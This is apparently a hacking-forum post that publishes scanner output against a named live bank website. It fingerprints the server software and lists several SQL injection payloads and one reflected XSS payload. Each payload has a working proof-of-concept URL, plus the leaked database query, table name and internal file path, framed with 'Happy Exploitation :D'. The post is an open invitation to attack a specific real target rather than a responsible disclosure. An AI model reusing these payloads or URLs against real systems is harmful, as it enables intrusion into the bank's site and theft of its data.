[SQLi+XSS] cgbank.in


#1
TeamSploit

[!] Scan URL or List of URLs? [1/2]: 1
 [!] Enter the URL: http://www.cgbank.in/innerpage.php?pageID=3

 [!] Fingerprinting the backend Technologies.
 [!] Status code: 200 OK
 [!] Host: www.cgbank.in
 [!] WebServer: Microsoft-IIS/8.5
 [!] x-powered-by
 [!] PHP/5.2.17, ASP.NET
 [!] Now Scanning for Remote Code/Command Execution
 [!] Covering Linux & Windows Operating Systems
 [!] Please wait ....
 [!] Target is not vulnerable!

 [!] Now Scanning for XSS
 [!] Please wait ....
 [*] Payload Found . . .
 [*] Payload:  %78%22%78%3e%78
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\"x>x' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=3x\"x>x in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=3%78%22%78%3e%78
 [*] Happy Exploitation :D
 [!] Congratulations you've found 1 bugs :-)

 [!] Now Scanning for Error Based SQL Injection
 [!] Covering MySQL, Oracle, MSSQL, MSACCESS & PostGreSQL Databases
 [!] Please wait ....
 [*] Payload Found . . .
 [*] Payload:  3'
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\' in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33'
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3%5c
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\\ in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33%5c
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3%27%22%28%29
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\"()' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\'\"() in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33%27%22%28%29
 [*] Happy Exploitation :D
 [*] Payload Found . . .
 [*] Payload:  3'><
 [!] Code Snippet: <b>Fatal error</b>:  You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'><' at line 1<br><br><b>Query:</b><br>select * from mainpages where id=33\'>< in <b>D:\INETPUB\VHOSTS\cgbank.in\httpdocs\ContentManagementSystem\library\class_mysql.php</b> on line <b>131</b><br />
 [*] POC: http://www.cgbank.in/innerpage.php?pageID=33'><
 [*] Happy Exploitation :D
 [!] Congratulations you've found 4 bugs :-)




